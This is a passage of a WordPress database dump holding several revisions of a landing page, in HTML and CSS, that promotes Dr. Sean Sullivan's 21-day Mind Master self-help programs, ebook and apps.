(1425, 4194, '2014-09-21 15:11:02', '2014-09-21 20:11:02', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<p><strong>The Mind Master</strong>&#8211;Back in 2007, Harvard University graduate Sean Sullivan was a clinical psychology doctoral student completing his research on how psychology and life coaching were being delivered over the Internet.</p>\r\n<p>He discovered major gaps in the ways that psychology and coaching were being delivered online so he set out to address the problem.</p>\r\n<p>Today, the future of brain training psychology for the Internet connected world is here. &#8220;Dr. Sean&#8221; is increasingly becoming the go-to psychologist coach for the rest of us&#8211;those of us who don&#8217;t go to therapy, but do want to use cutting edge psychology and brain science to realize our potential.</p>\r\n<p>Dr. Sean&#8217;s online Mind Master Programs are based on the world&#8217;s latest neuroscience detailed in his book, <a href="http://www.amazon.com/Mind-Masters-Silent-Journey-Becoming/dp/0983495580" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.amazon.com'']);" target="_blank"><span class="textarea_link">The Mind Master&#8217;s Silent Journey, A 21-Day Road Map to Becoming Expert in Your Chosen Life</span></a>.</p>\r\n<p>He&#8217;s blended a unique stew of personal storytelling and brain science into a step-by-step online system to change the bad habits you&#8217;ve developed and maintain inside your head.</p>\r\n<p>Unabashed in using his own life as an example, Dr. Sean actually shows you how we get in our own way. A distinct personal responsibility theme runs through the 21-day programs.</p>\r\n<p>First, you uncover how and why you created your personal obstacles. Then, you walk through removing them from your life. The process is simple. But you don&#8217;t get off easy.</p>\r\n<p>You choose what aspect of your life you want to focus on improving &#8212; lose weight, get fit, become happier, master your stress or anxiety, improve or heal relationships, quit smoking &#8212; or you can join the monthly group Health Challenge and define your own personal goal to master.</p>\r\n<p>The programs include short daily videos you watch first thing in the morning on your smart phone, tablet, or computer. You&#8217;ll then complete your &#8220;Daily Ritual&#8221;&#8211; a mind and body exercise sequence that prepares your brain for your personal work for the day.</p>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>         You commit one hour each day for 21 total days of retraining your brain. It&#8217;s fine to take days or weekends off to fit your schedule.</p>\r\n<p>The promise is that by the end of your 21-day program you&#8217;ve learned and practiced all the psychological tools and skills, and also implemented all the habits necessary to master your personal goal.</p>\r\n<p>Dr. Sean&#8217;s unscripted, direct to camera videos are uncommonly personally revealing&#8211;especially in the world of professional psychology.</p>\r\n<p>Marta Wegorzewska, a Ph.D. candidate in Developmental and Stem Cell Biology, recently completed her 21-day program focused on mastering stress and anxiety. She says, &#8220;It was like having a psychologist who is your close friend sitting beside you every day. It&#8217;s so helpful and it works. I&#8217;m a scientist. I saw results.&#8221;</p>\r\n<p>You won&#8217;t set foot in a psychologist&#8217;s office or pay for a session. While <a href="http://www.drseansullivan.com/contact/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.drseansullivan.com'']);" target="_blank">Dr. Sean can be contacted</a> at his private psychotherapy practice in San Francisco, The 21-Day Mind Master Programs are accessed online or in apps.</p>\r\n<p>&#8220;The Mind Master is a do-it-yourself boot camp for your brain health and emotional intelligence. It&#8217;s important information to share,&#8221; Dr. Sean asserts. &#8220;I&#8217;ve always given the book away for free in the apps. I want it to be available to as many people as possible.&#8221;</p>\r\n<p>He&#8217;s well on his way. New York Jets Quarterback, Mark Sanchez, has commented, &#8220;Dr. Sullivan is a game changing new voice in the psychology of peak performance.&#8221;</p>\r\n<p>Mr. Sanchez is not the only one taking notice. In 2012, The Mind Master&#8217;s Map became the #1 Self Help Books app on iPad. You can now download the free <a href="https://itunes.apple.com/us/app/the-mind-masters-map-iphone/id446468278?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPhone app</span></a> and free <a href="https://itunes.apple.com/us/app/the-mind-masters-map/id441043981?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPad app</span></a> versions of the 21-day programs.</p>\r\n<p>The Mind Master is now also collaborating with health and wellness conscious organizations and employers</span></a> to deliver Group Mind Master Programs led by Dr. Sean. You can join us anytime in <a href="https://www.popexpert.com/mindmaster?code=mindmasterchallenge" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.popexpert.com'']);" target="_blank"><span class="textarea_link">The 21 Day Mind Master Health Challenge</span></a> presented with PopExpert. <a href="https://my.leadpages.net/leadbox/14158d173f72a2%3A1283fa00eb46dc/5718998062727168/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://my.leadpages.net'']);" target="_blank">Click here to be notified when The Mind Master Challenges launch.</a><script type="text/javascript" src="//my.leadpages.net/leadbox-680.js"></script></p>\r\n<p>If you&#8217;re ready to begin mastering you mind on your own right now, you can choose your <a href="http://themindmaster.com/new/featuring-prices2/"  target="_blank"><span class="textarea_link">21 Day Mind Master Program right here.</span></a></span></a></p>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:11:02', '2014-09-21 20:11:02', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1422, 4194, '2014-09-21 14:58:27', '2014-09-21 19:58:27', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<p><strong>The Mind Master</strong>&#8211;Back in 2007, Harvard University graduate Sean Sullivan was a clinical psychology doctoral student completing his research on how psychology and life coaching were being delivered over the Internet.</p>\r\n<p>He discovered major gaps in the ways that psychology and coaching were being delivered online so he set out to address the problem.</p>\r\n<p>Today, the future of brain training psychology for the Internet connected world is here. &#8220;Dr. Sean&#8221; is increasingly becoming the go-to psychologist coach for the rest of us&#8211;those of us who don&#8217;t go to therapy, but do want to use cutting edge psychology and brain science to realize our potential.</p>\r\n<p>Dr. Sean&#8217;s online Mind Master Programs are based on the world&#8217;s latest neuroscience detailed in his book, <a href="http://www.amazon.com/Mind-Masters-Silent-Journey-Becoming/dp/0983495580" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.amazon.com'']);" target="_blank"><span class="textarea_link">The Mind Master&#8217;s Silent Journey, A 21-Day Road Map to Becoming Expert in Your Chosen Life</span></a>.</p>\r\n<p>He&#8217;s blended a unique stew of personal storytelling and brain science into a step-by-step online system to change the bad habits you&#8217;ve developed and maintain inside your head.</p>\r\n<p>Unabashed in using his own life as an example, Dr. Sean actually shows you how we get in our own way. A distinct personal responsibility theme runs through the 21-day programs.</p>\r\n<p>First, you uncover how and why you created your personal obstacles. Then, you walk through removing them from your life. The process is simple. But you don&#8217;t get off easy.</p>\r\n<p>You choose what aspect of your life you want to focus on improving &#8212; lose weight, get fit, become happier, master your stress or anxiety, improve or heal relationships, quit smoking &#8212; or you can join the monthly group Health Challenge and define your own personal goal to master.</p>\r\n<p>The programs include short daily videos you watch first thing in the morning on your smart phone, tablet, or computer. You&#8217;ll then complete your &#8220;Daily Ritual&#8221;&#8211; a mind and body exercise sequence that prepares your brain for your personal work for the day.</p>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>         You commit one hour each day for 21 total days of retraining your brain. It&#8217;s fine to take days or weekends off to fit your schedule.</p>\r\n<p>The promise is that by the end of your 21-day program you&#8217;ve learned and practiced all the psychological tools and skills, and also implemented all the habits necessary to master your personal goal.</p>\r\n<p>Dr. Sean&#8217;s unscripted, direct to camera videos are uncommonly personally revealing&#8211;especially in the world of professional psychology.</p>\r\n<p>Marta Wegorzewska, a Ph.D. candidate in Developmental and Stem Cell Biology, recently completed her 21-day program focused on mastering stress and anxiety. She says, &#8220;It was like having a psychologist who is your close friend sitting beside you every day. It&#8217;s so helpful and it works. I&#8217;m a scientist. I saw results.&#8221;</p>\r\n<p>You won&#8217;t set foot in a psychologist&#8217;s office or pay for a session. While <a href="http://www.drseansullivan.com/contact/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.drseansullivan.com'']);" target="_blank">Dr. Sean can be contacted</a> at his private psychotherapy practice in San Francisco, The 21-Day Mind Master Programs are accessed online or in apps.</p>\r\n<p>&#8220;The Mind Master is a do-it-yourself boot camp for your brain health and emotional intelligence. It&#8217;s important information to share,&#8221; Dr. Sean asserts. &#8220;I&#8217;ve always given the book away for free in the apps. I want it to be available to as many people as possible.&#8221;</p>\r\n<p>He&#8217;s well on his way. New York Jets Quarterback, Mark Sanchez, has commented, &#8220;Dr. Sullivan is a game changing new voice in the psychology of peak performance.&#8221;</p>\r\n<p>Mr. Sanchez is not the only one taking notice. In 2012, The Mind Master&#8217;s Map became the #1 Self Help Books app on iPad. You can now download the free <a href="https://itunes.apple.com/us/app/the-mind-masters-map-iphone/id446468278?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPhone app</span></a> and free <a href="https://itunes.apple.com/us/app/the-mind-masters-map/id441043981?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPad app</span></a> versions of the 21-day programs.</p>\r\n<p>The Mind Master is now also collaborating with health and wellness conscious organizations and employers</span></a> to deliver Group Mind Master Programs led by Dr. Sean. You can join us anytime in <a href="https://www.popexpert.com/mindmaster?code=mindmasterchallenge" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.popexpert.com'']);" target="_blank"><span class="textarea_link">The 21 Day Mind Master Health Challenge</span></a> presented with PopExpert. <a href="https://my.leadpages.net/leadbox/14158d173f72a2%3A1283fa00eb46dc/5718998062727168/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://my.leadpages.net'']);" target="_blank">Click here to be notified when The Mind Master Challenges launch.</a><script type="text/javascript" src="//my.leadpages.net/leadbox-680.js"></script></p>\r\n<p>If you&#8217;re ready to begin mastering you mind on your own right now, you can choose your <a href="http://themindmaster.com/new/featuring-prices2/"  target="_blank"><span class="textarea_link">21 Day Mind Master Program right here.</span></a></span></a></p>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n/* <![CDATA[ */\r\nvar thickboxL10n = {\r\n	next: "Next &gt;",\r\n	prev: "&lt; Prev",\r\n	image: "Image",\r\n	of: "of",\r\n	close: "Close",\r\n	noiframes: "This feature requires inline frames. You have iframes disabled or your browser does not support them.",\r\n	loadingAnimation: "images/loadingAnimation.gif",\r\n	closeImage: "images/tb-close.png"\r\n};\r\ntry{convertEntities(thickboxL10n);}catch(e){};\r\n/* ]]> */\r\n</script>\r\n<script type=''text/javascript'' src=''js/thickbox/thickbox.js''></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 14:58:27', '2014-09-21 19:58:27', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0),
(1424, 4194, '2014-09-21 15:07:34', '2014-09-21 20:07:34', '	<div id="main">\r\n\r\n    	<div id="logo"><img src="images/logo.png" width="650px" height="141px" /></div>\r\n\r\n        <div id="banner">\r\n        	<img style="margin: 0px; cursor: pointer;" onClick="javascript:showvideo();" src="images/banner-new.jpg" width="562px" height="292px" />\r\n         </div>\r\n\r\n        <div id="three_steps">\r\n\r\n\r\n        	<div class="step1">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>Clear Your Beliefs eBOOK</h1>\r\n\r\n                <h2>DOWNLOAD YOUR FREE<BR />\r\n\r\n                eBOOK</h2>\r\n\r\n                    <div id="step1_button"><div id="mc_embed_signup" style="width: 240px; margin-left:9px;">\r\n\r\n<form id="mc-embedded-subscribe-form" class="validate" style="font: ''AGaramondPro''; font-size: 16px;" action="" method="post">\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<table border="0" cellpadding="2" cellspacing="3"><tr><td class="frmtext">\r\n\r\n<b>First Name</b></td><td><input id="mce-FNAME" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="FNAME" /></td></tr></div>\r\n\r\n<div class="mc-field-group" style="clear: both; overflow: hidden;">\r\n\r\n<tr><td class="frmtext">\r\n\r\n<b>Email</b></td><td><input id="mce-EMAIL" class="required email" style=" padding: .2em .3em; z-index: 999; border:solid #8C1014 2px;" type="text" name="EMAIL" border="1px solid #8C1014" /></td></tr></table></div>\r\n\r\n<input type="image" src="images/get_access.png" name="Submit" value="Submit" style="padding-top:10px;" onClick="formsubmit();"></form></div></div>\r\n\r\n</div>\r\n\r\n\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step2">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>iClearIt APP</h1>\r\n\r\n                    <div id="mindmaster_img"><img src="images/mindmaster.png"  width="86px" height="86px" /></div>\r\n\r\n                    <h2>DOWNLOAD THE <BR />\r\n\r\n                	iClearIt APP</h2>\r\n\r\n                    <div id="button">\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearit.com" target="_blank"><img src="images/ipad_button.png" width="224px" height="52px" /></a></div>\r\n\r\n                        <div class="step2_buttons"><a href="http://iClearIt.com" target="_blank"><img src="images/iphone_button.png"  width="224px" height="52px" /></a></div>\r\n\r\n                    </div>\r\n\r\n					</div>\r\n\r\n            </div>\r\n\r\n            \r\n\r\n            <div class="step3">\r\n\r\n				<div class="stepinner">\r\n\r\n            	<h1>CLEAR YOUR BELIEFS</h1>\r\n\r\n                    <div id="step3_img"><img src="images/step3_img.png" width="201px" height="161px" /></div>\r\n\r\n                    <h2>Choose a Goal & <BR />\r\n\r\n                	Master Your Chosen Life</h2>\r\n\r\n                    <div class="step3_buttons"><a href=""><img src="images/step3_button.png" width="204px" height="62px" /></a></div>\r\n\r\n            </div>\r\n\r\n			</div>\r\n\r\n			</div>\r\n		<div id="textarea">\r\n		<div id="leftside">\r\n<div id="lefttext">\r\n<p><strong>The Mind Master</strong>&#8211;Back in 2007, Harvard University graduate Sean Sullivan was a clinical psychology doctoral student completing his research on how psychology and life coaching were being delivered over the Internet.</p>\r\n<p>He discovered major gaps in the ways that psychology and coaching were being delivered online so he set out to address the problem.</p>\r\n<p>Today, the future of brain training psychology for the Internet connected world is here. &#8220;Dr. Sean&#8221; is increasingly becoming the go-to psychologist coach for the rest of us&#8211;those of us who don&#8217;t go to therapy, but do want to use cutting edge psychology and brain science to realize our potential.</p>\r\n<p>Dr. Sean&#8217;s online Mind Master Programs are based on the world&#8217;s latest neuroscience detailed in his book, <a href="http://www.amazon.com/Mind-Masters-Silent-Journey-Becoming/dp/0983495580" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.amazon.com'']);" target="_blank"><span class="textarea_link">The Mind Master&#8217;s Silent Journey, A 21-Day Road Map to Becoming Expert in Your Chosen Life</span></a>.</p>\r\n<p>He&#8217;s blended a unique stew of personal storytelling and brain science into a step-by-step online system to change the bad habits you&#8217;ve developed and maintain inside your head.</p>\r\n<p>Unabashed in using his own life as an example, Dr. Sean actually shows you how we get in our own way. A distinct personal responsibility theme runs through the 21-day programs.</p>\r\n<p>First, you uncover how and why you created your personal obstacles. Then, you walk through removing them from your life. The process is simple. But you don&#8217;t get off easy.</p>\r\n<p>You choose what aspect of your life you want to focus on improving &#8212; lose weight, get fit, become happier, master your stress or anxiety, improve or heal relationships, quit smoking &#8212; or you can join the monthly group Health Challenge and define your own personal goal to master.</p>\r\n<p>The programs include short daily videos you watch first thing in the morning on your smart phone, tablet, or computer. You&#8217;ll then complete your &#8220;Daily Ritual&#8221;&#8211; a mind and body exercise sequence that prepares your brain for your personal work for the day.</p>\r\n</div>\r\n</div>\r\n<div id="rightside">\r\n<div id="righttext">\r\n<p>         You commit one hour each day for 21 total days of retraining your brain. It&#8217;s fine to take days or weekends off to fit your schedule.</p>\r\n<p>The promise is that by the end of your 21-day program you&#8217;ve learned and practiced all the psychological tools and skills, and also implemented all the habits necessary to master your personal goal.</p>\r\n<p>Dr. Sean&#8217;s unscripted, direct to camera videos are uncommonly personally revealing&#8211;especially in the world of professional psychology.</p>\r\n<p>Marta Wegorzewska, a Ph.D. candidate in Developmental and Stem Cell Biology, recently completed her 21-day program focused on mastering stress and anxiety. She says, &#8220;It was like having a psychologist who is your close friend sitting beside you every day. It&#8217;s so helpful and it works. I&#8217;m a scientist. I saw results.&#8221;</p>\r\n<p>You won&#8217;t set foot in a psychologist&#8217;s office or pay for a session. While <a href="http://www.drseansullivan.com/contact/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.drseansullivan.com'']);" target="_blank">Dr. Sean can be contacted</a> at his private psychotherapy practice in San Francisco, The 21-Day Mind Master Programs are accessed online or in apps.</p>\r\n<p>&#8220;The Mind Master is a do-it-yourself boot camp for your brain health and emotional intelligence. It&#8217;s important information to share,&#8221; Dr. Sean asserts. &#8220;I&#8217;ve always given the book away for free in the apps. I want it to be available to as many people as possible.&#8221;</p>\r\n<p>He&#8217;s well on his way. New York Jets Quarterback, Mark Sanchez, has commented, &#8220;Dr. Sullivan is a game changing new voice in the psychology of peak performance.&#8221;</p>\r\n<p>Mr. Sanchez is not the only one taking notice. In 2012, The Mind Master&#8217;s Map became the #1 Self Help Books app on iPad. You can now download the free <a href="https://itunes.apple.com/us/app/the-mind-masters-map-iphone/id446468278?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPhone app</span></a> and free <a href="https://itunes.apple.com/us/app/the-mind-masters-map/id441043981?mt=8&amp;ign-mpt=uo%3D4" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://itunes.apple.com'']);" target="_blank"><span class="textarea_link">iPad app</span></a> versions of the 21-day programs.</p>\r\n<p>The Mind Master is now also collaborating with health and wellness conscious organizations and employers</span></a> to deliver Group Mind Master Programs led by Dr. Sean. You can join us anytime in <a href="https://www.popexpert.com/mindmaster?code=mindmasterchallenge" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://www.popexpert.com'']);" target="_blank"><span class="textarea_link">The 21 Day Mind Master Health Challenge</span></a> presented with PopExpert. <a href="https://my.leadpages.net/leadbox/14158d173f72a2%3A1283fa00eb46dc/5718998062727168/" onclick="javascript:_gaq.push([''_trackEvent'',''outbound-article'',''http://my.leadpages.net'']);" target="_blank">Click here to be notified when The Mind Master Challenges launch.</a><script type="text/javascript" src="//my.leadpages.net/leadbox-680.js"></script></p>\r\n<p>If you&#8217;re ready to begin mastering you mind on your own right now, you can choose your <a href="http://themindmaster.com/new/featuring-prices2/"  target="_blank"><span class="textarea_link">21 Day Mind Master Program right here.</span></a></span></a></p>\r\n</div>\r\n</div>\r\n            	                    \r\n                    \r\n                                \r\n            </div>\r\n        \r\n        <div style="clear:both"></div>\r\n       <div class="bott_heading">Are you ready to master your mind?</div>\r\n       <div id="bottom_buttons">\r\n       	<div class="bott_button"><a href=""><img src="images/bott_button.png" width="250px" height="66px" /></a></div>\r\n        <div id="bott_or">OR</div>\r\n        <div class="bott_button"><a href="http://www.drseansullivan.com"><img src="images/bott_button1.png" width="250px" height="66px"  /></a></div>\r\n       \r\n       </div>\r\n	   \r\n	       \r\n    </div>\r\n/* <![CDATA[ */\r\nvar thickboxL10n = {\r\n	next: "Next &gt;",\r\n	prev: "&lt; Prev",\r\n	image: "Image",\r\n	of: "of",\r\n	close: "Close",\r\n	noiframes: "This feature requires inline frames. You have iframes disabled or your browser does not support them.",\r\n	loadingAnimation: "images/loadingAnimation.gif",\r\n	closeImage: "images/tb-close.png"\r\n};\r\ntry{convertEntities(thickboxL10n);}catch(e){};\r\n/* ]]> */\r\n</script>\r\n<script type=''text/javascript'' src=''js/thickbox/thickbox.js''></script>', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '1421-revision-v1', '', '', '2014-09-21 15:07:34', '2014-09-21 20:07:34', '', 1421, 'http://clearyourbeliefs.com/1421-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1423, 4194, '2014-09-21 15:00:47', '2014-09-21 20:00:47', '<style>\r\n@charset "utf-8";\r\n\r\n/* CSS Document */\r\n\r\n\r\n\r\nbody, html{\r\n\r\n	\r\n\r\n}\r\n\r\n\r\n\r\nimg{ border:0px;\r\n\r\n}\r\n\r\n\r\n\r\n@font-face\r\n\r\n{\r\n\r\nfont-family: AGaramondPro;\r\n\r\nsrc: url(''AGaramondPro-Regular.otf''),\r\n\r\n     url(''AGaramondPro-Regular.otf''); /* IE9 */\r\n\r\n}\r\n\r\n@font-face\r\n\r\n{\r\n\r\nfont-family: MyriadPro-Black;\r\n\r\nsrc: url(''MyriadPro-Black.otf''),\r\n\r\n     url(''MyriadPro-Black.otf''); /* IE9 */\r\n\r\n}\r\n\r\n#main{\r\n\r\n	width:845px;\r\n\r\n	margin: 0 auto;\r\n\r\n	padding:0 0 20px 0;\r\n\r\n	margin:0 auto;\r\n\r\n}\r\n\r\n\r\n\r\n#logo{\r\n\r\n	width:100%;\r\n\r\n	height:141px;\r\n\r\n	text-align:center;\r\n\r\n	margin-top:10px;\r\n\r\n}\r\n\r\n\r\n\r\n#banner{\r\n\r\n	width:100%;\r\n\r\n	height:292px;\r\n\r\n	text-align:center;\r\n\r\n}\r\n\r\n#widget{\r\n	text-align:center;\r\n	float:left;\r\n}\r\n\r\n\r\n#three_steps{\r\n\r\n	width:805px;\r\n\r\n	padding-top:15px;\r\n\r\n	margin:0 auto;\r\n\r\n	\r\n\r\n}\r\n\r\n.stepinner{\r\n\r\nwidth:258px;}\r\n\r\n.step1{\r\n\r\n	width:265px;\r\n\r\n	height:363px;\r\n\r\n	float:left;\r\n\r\n	background-image:url(images/step1.png);\r\n\r\n	background-repeat:no-repeat;\r\n\r\n}\r\n\r\n\r\n\r\n.step1 h1{\r\n\r\n	font-family:Arial, Helvetica, sans-serif;\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:normal;\r\n\r\n	color:#FFF;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	margin:0px;\r\n\r\n	padding-top:10px;\r\n\r\n}\r\n\r\n\r\n\r\n.step1 h2{\r\n\r\n	font-family: "MyriadPro-Black";\r\n\r\n	font-size:20px;\r\n\r\n	font-weight:bold;\r\n\r\n	color:#b30041;\r\n\r\n	width:100%;\r\n\r\n	text-align:center;\r\n\r\n	line-height:22px;\r\n\r\n	margin:0px;\r\n\r\n	